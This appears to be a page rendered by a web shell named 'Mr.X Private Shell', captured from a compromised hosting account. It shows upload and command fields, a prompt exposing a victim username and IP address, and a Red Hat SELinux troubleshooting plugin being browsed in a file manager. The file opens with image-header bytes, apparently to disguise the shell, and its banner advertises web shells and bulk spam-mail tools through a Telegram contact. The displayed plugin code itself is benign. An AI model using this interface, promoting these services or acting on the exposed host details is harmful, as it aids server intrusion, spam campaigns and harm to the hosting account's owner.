����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

dccreditrepairto@216.73.216.185: ~ $
#
# Copyright (C) 2006-2010 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

import gettext
translation=gettext.translation('setroubleshoot-plugins', fallback=True)
_=translation.gettext

from setroubleshoot.util import *
from setroubleshoot.Plugin import Plugin

import subprocess
import sys

def is_execstack(path):
    if path[0] != "/":
        return False

    try:
        x = subprocess.check_output(["execstack",  "-q", path], universal_newlines=True).split()
    except:
        return False
    return ( x[0] == "X" )

def find_execstack(exe, pid):
    execstacklist = []
    try:
        paths = subprocess.check_output(["ldd", exe], universal_newlines=True).split()
    except:
        return execstacklist
    for path in paths:
        if is_execstack(path) and path not in execstacklist:
            execstacklist.append(path)
    try:
        fd = open("/proc/%s/maps" % pid , "r")
        for rec in fd.readlines():
            for path in rec.split():
                if is_execstack(path) and path not in execstacklist:
                    execstacklist.append(path)
    except IOError:
        pass

    return execstacklist

class plugin(Plugin):
    summary =_('''
    SELinux is preventing $SOURCE_PATH from making the program stack executable.
    ''')

    problem_description = _('''
    The $SOURCE application attempted to make its stack
    executable.  This is a potential security problem.  This should
    never ever be necessary. Stack memory is not executable on most
    OSes these days and this will not change. Executable stack memory
    is one of the biggest security problems. An execstack error might
    in fact be most likely raised by malicious code. Applications are
    sometimes coded incorrectly and request this permission.  The
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    web page explains how to remove this requirement.  If $SOURCE does not
    work and you need it to work, you can configure SELinux
    temporarily to allow this access until the application is fixed. Please
file a bug report.
    ''')

    fix_description = _('''
    Sometimes a library is accidentally marked with the execstack flag,
    if you find a library with this flag you can clear it with the
    execstack -c LIBRARY_PATH.  Then retry your application.  If the
    app continues to not work, you can turn the flag back on with
    execstack -s LIBRARY_PATH.
    ''')

    fix_cmd = ""

    if_text = _("If you do not think $SOURCE_PATH should need to map stack memory that is both writable and executable.")
    then_text = _("you need to report a bug. \nThis is a potentially dangerous access.")
    do_text = _("Contact your security administrator and report this issue.")

    def get_if_text(self, avc, args):
        try:
            path = args[0]
            if not path:
                return self.if_text

            return _("If you believe that \n%s\nshould not require execstack") % path
        except:
            return self.if_text

    def get_then_text(self, avc, args):
        try:
            path = args[0]
            if not path:
                return self.then_text
            return _("you should clear the execstack flag and see if $SOURCE_PATH works correctly.\nReport this as a bug on %s.\nYou can clear the exestack flag by executing:") % path
        except:
            return self.then_text

    def get_do_text(self, avc, args):
        try:
            path = args[0]
            if not path:
                return self.do_text

            return _("execstack -c %s") % path
        except:
            return self.do_text

    def __init__(self):
        Plugin.__init__(self,__name__)

    def analyze(self, avc):
        if (avc.matches_source_types(['unconfined_t', 'staff_t', 'user_t', 'guest_t', 'xguest_t']) and
           avc.has_any_access_in(['execstack'])):
            reports = []
            for i in find_execstack(avc.spath, avc.pid):
                reports.append(self.report((i,avc)))

            if len(reports) > 0:
                return reports

            return self.report((None,None))
        else:
            return None

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 2 B 0644
allow_anon_write.py File 3.25 KB 0644
allow_execheap.py File 2.39 KB 0644
allow_execmem.py File 3.07 KB 0644
allow_execmod.py File 5.41 KB 0644
allow_execstack.py File 4.73 KB 0644
allow_ftpd_use_cifs.py File 3.41 KB 0644
allow_ftpd_use_nfs.py File 3.3 KB 0644
associate.py File 2.15 KB 0644
automount_exec_config.py File 2.66 KB 0644
bind_ports.py File 2.81 KB 0644
catchall.py File 2.89 KB 0644
catchall_boolean.py File 2.89 KB 0644
catchall_labels.py File 2.2 KB 0644
chrome.py File 2.6 KB 0644
connect_ports.py File 2.68 KB 0644
cvs_data.py File 2.58 KB 0644
dac_override.py File 2.1 KB 0644
device.py File 2.74 KB 0644
disable_ipv6.py File 1.62 KB 0644
file.py File 3.21 KB 0644
filesystem_associate.py File 2.46 KB 0644
httpd_can_sendmail.py File 1.93 KB 0644
httpd_unified.py File 2.86 KB 0644
httpd_write_content.py File 2.11 KB 0644
kernel_modules.py File 2.74 KB 0644
leaks.py File 2.49 KB 0644
mmap_zero.py File 2.33 KB 0644
mounton.py File 2.48 KB 0644
mozplugger.py File 2.79 KB 0644
mozplugger_remove.py File 2.17 KB 0644
openvpn.py File 2.76 KB 0644
public_content.py File 2.57 KB 0644
qemu_blk_image.py File 2.55 KB 0644
qemu_file_image.py File 2.88 KB 0644
restorecon.py File 5.34 KB 0644
restorecon_source.py File 3.01 KB 0644
rsync_data.py File 2.53 KB 0644
samba_share.py File 2.94 KB 0644
sandbox_connect.py File 2.23 KB 0644
selinuxpolicy.py File 3.09 KB 0644
setenforce.py File 2.39 KB 0644
sshd_root.py File 2.08 KB 0644
swapfile.py File 2.23 KB 0644
sys_module.py File 2.35 KB 0644
sys_resource.py File 2.62 KB 0644
vbetool.py File 2.52 KB 0644
wine.py File 2.92 KB 0644
xen_image.py File 2.8 KB 0644